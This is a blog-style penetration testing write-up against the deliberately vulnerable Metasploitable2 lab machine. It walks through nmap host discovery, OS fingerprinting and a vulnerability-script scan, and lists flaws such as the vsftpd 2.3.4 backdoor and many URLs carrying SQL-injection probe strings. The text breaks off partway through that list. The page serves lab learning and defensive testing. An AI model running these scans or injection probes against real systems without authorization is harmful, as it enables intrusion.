-->

ABOUT US

Our development agency is committed to providing you the best service.

OUR TEAM

The awesome people behind our brand ... and their life motto.

  • Kumar Atul Jaiswal

    Ethical Hacker

    Hacking is a Speed of Innovation And Technology with Romance.

  • Kumar Atul Jaiswal

    CEO Of Hacking Truth

    Loopholes are every major Security,Just need to Understand it well.

  • Kumar Atul Jaiswal

    Web Developer

    Techonology is the best way to Change Everything, like Mindset Goal.

OUR SKILLS

We pride ourselves with strong, flexible and top notch skills.

Marketing

Development 90%
Design 80%
Marketing 70%

Websites

Development 90%
Design 80%
Marketing 70%

PR

Development 90%
Design 80%
Marketing 70%

ACHIEVEMENTS

We help our clients integrate, analyze, and use their data to improve their business.

150

GREAT PROJECTS

300

HAPPY CLIENTS

650

COFFEES DRUNK

1568

FACEBOOK LIKES

STRATEGY & CREATIVITY

Phasellus iaculis dolor nec urna nullam. Vivamus mattis blandit porttitor nullam.

PORTFOLIO

We pride ourselves on bringing a fresh perspective and effective marketing to each project.

Showing posts with label Vulnerability Assessment & Penetration Testing Report. Show all posts
Showing posts with label Vulnerability Assessment & Penetration Testing Report. Show all posts
  • Vulnerability Assessment & Penetration Testing Report Metasploitable2


    Vulnerability Assessment & Penetration Testing Report Metasploitable2



    Vulnerability Assessment & Penetration Testing Report on Metasploitable2


    Vapt or Vulnerability Assessment is the process of defining, identifying, classifying and prioritizing vulnerabilities in computer systems, application and network infrastructures and providing the organization doing the assessment with the necessary knowledge, awareness and risk background to understand the threats to its environment and react appropriately.


    Penetration testing (or pentesting) is a simulated cyber attack where professional ethical hackers break into corporate networks to find weaknesses ... before attackers do.

    It's like in the movie Sneakers, where hacker-consultants break into your corporate networks to find weaknesses before attackers do. It’s a simulated cyber attack where the pentester or ethical hacker uses the tools and techniques available to malicious hackers.



    Life Cycle of Penetration Testing:

    1] Reconnaissance

    2] Scanning

    3] Exploitation

    4] Maintaining Access



    Reconnaissance


    First, we denotes the work of information gathering before any real attacks are planned (like Reconnaissance). Recon is probably the longest phase, sometimes testing weeks or months. But here we have a know target, a Metasploitable2 machine connected to same network as on us to find the target machine we will run an Nmap scan



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ sudo nmap -sV -sP 192.168.43.1-255 > livehosts.txt
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ 
    



    Here, as you can see above the command line and this is IP range that i writter there because we want to know OS details of every system connected to the network so that we can find our target machine. So first we need to sapearate out the live IP address (livehosts.txt) so we save the above result in a text file and then filter the IP address using the command.

    and then see the below comand cat livehosts.txt | grep "for" | cut -d " " -f5 > ip.txt.

    Here, We have filtered the file as well as saved the output in a new file and finally our result is in front of you.



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ cat livehosts.txt | grep "for" | cut -d " " -f5 > ip.txt
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ 
    



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ cat ip.txt                                              
    192.168.43.1
    192.168.43.120
    192.168.43.152
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ 
    


    Now what we are doing now!! so, now we have to check which one of them is a metasploitable2 machine so we will run an script which will detect the OS of all the live IP's



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ sudo nmap -sV -O -iL ip.txt > osdetails.txt        
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ ls
    ip.txt  livehosts.txt  osdetails.txt  vapt-report.txt
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ 
    



    Our output is here :-)



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ cat osdetails.txt                                       
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-09 23:24 IST
    Nmap scan report for 192.168.43.1
    Host is up (0.0026s latency).
    Not shown: 999 closed ports
    PORT   STATE SERVICE VERSION
    53/tcp open  domain  dnsmasq 2.51
    MAC Address: 2A:09:08:63:43:8D (Unknown)
    No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
    TCP/IP fingerprint:
    OS:SCAN(V=7.91%E=4%D=7/9%OT=53%CT=1%CU=37640%PV=Y%DS=1%DC=D%G=Y%M=2A0908%TM
    OS:=60E88DBB%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%
    OS:TS=A)OPS(O1=M5B4ST11NW8%O2=M5B4ST11NW8%O3=M5B4NNT11NW8%O4=M5B4ST11NW8%O5
    OS:=M5B4ST11NW8%O6=M5B4ST11)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=
    OS:FFFF)ECN(R=Y%DF=Y%T=40%W=FFFF%O=M5B4NNSNW8%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
    OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
    OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
    OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
    OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
    OS:%T=40%CD=S)
    
    Network Distance: 1 hop
    
    Nmap scan report for 192.168.43.120
    Host is up (0.00071s latency).
    Not shown: 977 closed ports
    PORT     STATE SERVICE     VERSION
    21/tcp   open  ftp         vsftpd 2.3.4
    22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
    23/tcp   open  telnet      Linux telnetd
    25/tcp   open  smtp        Postfix smtpd
    53/tcp   open  domain      ISC BIND 9.4.2
    80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
    111/tcp  open  rpcbind     2 (RPC #100000)
    139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    512/tcp  open  exec?
    513/tcp  open  login
    514/tcp  open  shell?
    1099/tcp open  java-rmi    GNU Classpath grmiregistry
    1524/tcp open  bindshell   Metasploitable root shell
    2049/tcp open  nfs         2-4 (RPC #100003)
    2121/tcp open  ftp         ProFTPD 1.3.1
    3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
    5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
    5900/tcp open  vnc         VNC (protocol 3.3)
    6000/tcp open  X11         (access denied)
    6667/tcp open  irc         UnrealIRCd
    8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
    8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
    1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
    SF-Port514-TCP:V=7.91%I=7%D=7/9%Time=60E88D70%P=x86_64-pc-linux-gnu%r(NULL
    SF:,37,"\x01Couldn't\x20get\x20address\x20for\x20your\x20host\x20\(KumarAt
    SF:ulJaiswal\)\n");
    MAC Address: 08:00:27:67:67:30 (Oracle VirtualBox virtual NIC)
    Device type: general purpose
    Running: Linux 2.6.X
    OS CPE: cpe:/o:linux:linux_kernel:2.6
    OS details: Linux 2.6.9 - 2.6.33
    Network Distance: 1 hop
    Service Info: Hosts:  metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
    
    Nmap scan report for 192.168.43.152
    Host is up (0.000089s latency).
    Not shown: 999 closed ports
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
    Device type: general purpose
    Running: Linux 2.6.X
    OS CPE: cpe:/o:linux:linux_kernel:2.6.32
    OS details: Linux 2.6.32
    Network Distance: 0 hops
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 3 IP addresses (3 hosts up) scanned in 79.04 seconds
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ 
    
    
    
    


    So, as you can see here are so many information retrieve like Port, Service, Version, TCP/IP fingerprint, Host, OS details, MAC address, Network distance etc.



    Vulnerability Scanning


    In this scanning part we will scan the target machine for known vulnerabilities. So again we will use Nmap to run a script which will detect vulnerabilities in the system.




    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ sudo nmap -Pn --script vuln 192.168.43.120 > vuln.txt
    Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
    
    
    

    The output is here - 



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ cat vuln.txt              
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-09 23:31 IST
    Nmap scan report for 192.168.43.120
    Host is up (0.00014s latency).
    Not shown: 977 closed ports
    PORT     STATE SERVICE
    21/tcp   open  ftp
    | ftp-vsftpd-backdoor: 
    |   VULNERABLE:
    |   vsFTPd version 2.3.4 backdoor
    |     State: VULNERABLE (Exploitable)
    |     IDs:  BID:48539  CVE:CVE-2011-2523
    |       vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04.
    |     Disclosure date: 2011-07-03
    |     Exploit results:
    |       Shell command: id
    |       Results: uid=0(root) gid=0(root)
    |     References:
    |       https://www.securityfocus.com/bid/48539
    |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523
    |       https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
    |_      http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
    |_sslv2-drown: 
    22/tcp   open  ssh
    23/tcp   open  telnet
    25/tcp   open  smtp
    | smtp-vuln-cve2010-4344: 
    |_  The SMTP server is not Exim: NOT VULNERABLE
    | ssl-dh-params: 
    |   VULNERABLE:
    |   Anonymous Diffie-Hellman Key Exchange MitM Vulnerability
    |     State: VULNERABLE
    |       Transport Layer Security (TLS) services that use anonymous
    |       Diffie-Hellman key exchange only provide protection against passive
    |       eavesdropping, and are vulnerable to active man-in-the-middle attacks
    |       which could completely compromise the confidentiality and integrity
    |       of any data exchanged over the resulting session.
    |     Check results:
    |       ANONYMOUS DH GROUP 1
    |             Cipher Suite: TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA
    |             Modulus Type: Safe prime
    |             Modulus Source: Unknown/Custom-generated
    |             Modulus Length: 512
    |             Generator Length: 8
    |             Public Key Length: 512
    |     References:
    |       https://www.ietf.org/rfc/rfc2246.txt
    |   
    |   Transport Layer Security (TLS) Protocol DHE_EXPORT Ciphers Downgrade MitM (Logjam)
    |     State: VULNERABLE
    |     IDs:  BID:74733  CVE:CVE-2015-4000
    |       The Transport Layer Security (TLS) protocol contains a flaw that is
    |       triggered when handling Diffie-Hellman key exchanges defined with
    |       the DHE_EXPORT cipher. This may allow a man-in-the-middle attacker
    |       to downgrade the security of a TLS session to 512-bit export-grade
    |       cryptography, which is significantly weaker, allowing the attacker
    |       to more easily break the encryption and monitor or tamper with
    |       the encrypted stream.
    |     Disclosure date: 2015-5-19
    |     Check results:
    |       EXPORT-GRADE DH GROUP 1
    |             Cipher Suite: TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
    |             Modulus Type: Safe prime
    |             Modulus Source: Unknown/Custom-generated
    |             Modulus Length: 512
    |             Generator Length: 8
    |             Public Key Length: 512
    |     References:
    |       https://www.securityfocus.com/bid/74733
    |       https://weakdh.org
    |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000
    |   
    |   Diffie-Hellman Key Exchange Insufficient Group Strength
    |     State: VULNERABLE
    |       Transport Layer Security (TLS) services that use Diffie-Hellman groups
    |       of insufficient strength, especially those using one of a few commonly
    |       shared groups, may be susceptible to passive eavesdropping attacks.
    |     Check results:
    |       WEAK DH GROUP 1
    |             Cipher Suite: TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
    |             Modulus Type: Safe prime
    |             Modulus Source: postfix builtin
    |             Modulus Length: 1024
    |             Generator Length: 8
    |             Public Key Length: 1024
    |     References:
    |_      https://weakdh.org
    | ssl-poodle: 
    |   VULNERABLE:
    |   SSL POODLE information leak
    |     State: VULNERABLE
    |     IDs:  BID:70574  CVE:CVE-2014-3566
    |           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
    |           products, uses nondeterministic CBC padding, which makes it easier
    |           for man-in-the-middle attackers to obtain cleartext data via a
    |           padding-oracle attack, aka the "POODLE" issue.
    |     Disclosure date: 2014-10-14
    |     Check results:
    |       TLS_RSA_WITH_AES_128_CBC_SHA
    |     References:
    |       https://www.securityfocus.com/bid/70574
    |       https://www.openssl.org/~bodo/ssl-poodle.pdf
    |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
    |_      https://www.imperialviolet.org/2014/10/14/poodle.html
    |_sslv2-drown: ERROR: Script execution failed (use -d to debug)
    53/tcp   open  domain
    80/tcp   open  http
    | http-csrf: 
    | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.43.120
    |   Found the following possible CSRF vulnerabilities: 
    |     
    |     Path: http://192.168.43.120:80/dvwa/
    |     Form id: 
    |     Form action: login.php
    |     
    |     Path: http://192.168.43.120:80/twiki/TWikiDocumentation.html
    |     Form id: 
    |     Form action: http://TWiki.org/cgi-bin/passwd/TWiki/WebHome
    |     
    |     Path: http://192.168.43.120:80/twiki/TWikiDocumentation.html
    |     Form id: 
    |     Form action: http://TWiki.org/cgi-bin/passwd/Main/WebHome
    |     
    |     Path: http://192.168.43.120:80/twiki/TWikiDocumentation.html
    |     Form id: 
    |     Form action: http://TWiki.org/cgi-bin/edit/TWiki/
    |     
    |     Path: http://192.168.43.120:80/twiki/TWikiDocumentation.html
    |     Form id: 
    |     Form action: http://TWiki.org/cgi-bin/view/TWiki/TWikiSkins
    |     
    |     Path: http://192.168.43.120:80/twiki/TWikiDocumentation.html
    |     Form id: 
    |     Form action: http://TWiki.org/cgi-bin/manage/TWiki/ManagingWebs
    |     
    |     Path: http://192.168.43.120:80/mutillidae/index.php?page=register.php
    |     Form id: id-bad-cred-tr
    |     Form action: index.php?page=register.php
    |     
    |     Path: http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php
    |     Form id: iddnslookupform
    |     Form action: index.php?page=dns-lookup.php
    |     
    |     Path: http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php
    |     Form id: idpollform
    |_    Form action: index.php
    |_http-dombased-xss: Couldn't find any DOM based XSS.
    | http-enum: 
    |   /tikiwiki/: Tikiwiki
    |   /test/: Test page
    |   /phpinfo.php: Possible information file
    |   /phpMyAdmin/: phpMyAdmin
    |   /doc/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) dav/2'
    |   /html/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) dav/2'
    |   /icons/: Potentially interesting folder w/ directory listing
    |_  /index/: Potentially interesting folder
    | http-fileupload-exploiter: 
    |   
    |_    Couldn't find a file-type field.
    | http-slowloris-check: 
    |   VULNERABLE:
    |   Slowloris DOS attack
    |     State: LIKELY VULNERABLE
    |     IDs:  CVE:CVE-2007-6750
    |       Slowloris tries to keep many connections to the target web server open and hold
    |       them open as long as possible.  It accomplishes this by opening connections to
    |       the target web server and sending a partial request. By doing so, it starves
    |       the http server's resources causing Denial Of Service.
    |       
    |     Disclosure date: 2009-09-17
    |     References:
    |       http://ha.ckers.org/slowloris/
    |_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
    | http-sql-injection: 
    |   Possible sqli for queries:
    |     http://192.168.43.120:80/dav/?C=N%3bO%3dD%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=M%3bO%3dA%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=S%3bO%3dA%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=D%3bO%3dA%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=register.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=html5-storage.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=credits.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=usage-instructions.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=credits.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=login.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=captured-data.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=secret-administrative-pages.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=view-someones-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=user-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fhow-to-access-Mutillidae-over-Virtual-Box-network.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=home.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=browser-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=login.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=text-file-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=notes.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=php-errors.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=show-log.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=view-someones-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=source-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=source-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=password-generator.php%27%20OR%20sqlspider&username=anonymous
    |     http://192.168.43.120:80/mutillidae/index.php?page=framing.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=capture-data.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=change-log.htm%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=add-to-your-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?do=toggle-hints%27%20OR%20sqlspider&page=home.php
    |     http://192.168.43.120:80/mutillidae/index.php?page=installation.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?do=toggle-security%27%20OR%20sqlspider&page=home.php
    |     http://192.168.43.120:80/mutillidae/?page=user-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=set-background-color.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fvulnerabilities.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.9%27%20OR%20sqlspider&rev1=1.10
    |     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.9&rev1=1.10%27%20OR%20sqlspider
    |     http://192.168.43.120:80/oops/TWiki/TWikiHistory?template=oopsrev%27%20OR%20sqlspider&param1=1.10
    |     http://192.168.43.120:80/oops/TWiki/TWikiHistory?template=oopsrev&param1=1.10%27%20OR%20sqlspider
    |     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.8%27%20OR%20sqlspider&rev1=1.9
    |     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.8&rev1=1.9%27%20OR%20sqlspider
    |     http://192.168.43.120:80/view/TWiki/TWikiHistory?rev=1.7%27%20OR%20sqlspider
    |     http://192.168.43.120:80/view/TWiki/TWikiHistory?rev=1.8%27%20OR%20sqlspider
    |     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.7%27%20OR%20sqlspider&rev1=1.8
    |     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.7&rev1=1.8%27%20OR%20sqlspider
    |     http://192.168.43.120:80/view/TWiki/TWikiHistory?rev=1.9%27%20OR%20sqlspider
    |     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.7%27%20OR%20sqlspider&rev1=1.8
    |     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.7&rev1=1.8%27%20OR%20sqlspider
    |     http://192.168.43.120:80/view/TWiki/TWikiHistory?rev=1.7%27%20OR%20sqlspider
    |     http://192.168.43.120:80/view/TWiki/TWikiHistory?rev=1.9%27%20OR%20sqlspider
    |     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.8%27%20OR%20sqlspider&rev1=1.9
    |     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.8&rev1=1.9%27%20OR%20sqlspider
    |     http://192.168.43.120:80/view/TWiki/TWikiHistory?rev=1.8%27%20OR%20sqlspider
    |     http://192.168.43.120:80/oops/TWiki/TWikiHistory?template=oopsrev%27%20OR%20sqlspider&param1=1.10
    |     http://192.168.43.120:80/oops/TWiki/TWikiHistory?template=oopsrev&param1=1.10%27%20OR%20sqlspider
    |     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.9%27%20OR%20sqlspider&rev1=1.10
    |     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.9&rev1=1.10%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=N%3bO%3dA%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=M%3bO%3dA%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=S%3bO%3dA%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=D%3bO%3dA%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=N%3bO%3dA%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=D%3bO%3dA%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=S%3bO%3dA%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=M%3bO%3dD%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=S%3bO%3dD%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=N%3bO%3dA%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=M%3bO%3dA%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=D%3bO%3dA%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=N%3bO%3dA%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=M%3bO%3dA%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=S%3bO%3dA%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=D%3bO%3dD%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=register.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=html5-storage.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=credits.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=credits.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=login.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=captured-data.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=secret-administrative-pages.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=user-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fhow-to-access-Mutillidae-over-Virtual-Box-network.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=home.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=browser-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=login.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=text-file-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=set-background-color.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=view-someones-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=source-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=source-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=password-generator.php%27%20OR%20sqlspider&username=anonymous
    |     http://192.168.43.120:80/mutillidae/index.php?page=framing.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=capture-data.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=change-log.htm%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=add-to-your-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=show-log.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=installation.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=user-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=view-someones-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fvulnerabilities.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=register.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=html5-storage.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=credits.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=credits.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=login.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=captured-data.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=secret-administrative-pages.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=user-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fhow-to-access-Mutillidae-over-Virtual-Box-network.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=home.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=browser-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=login.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=text-file-viewer.php%27%20OR%20sqlspider
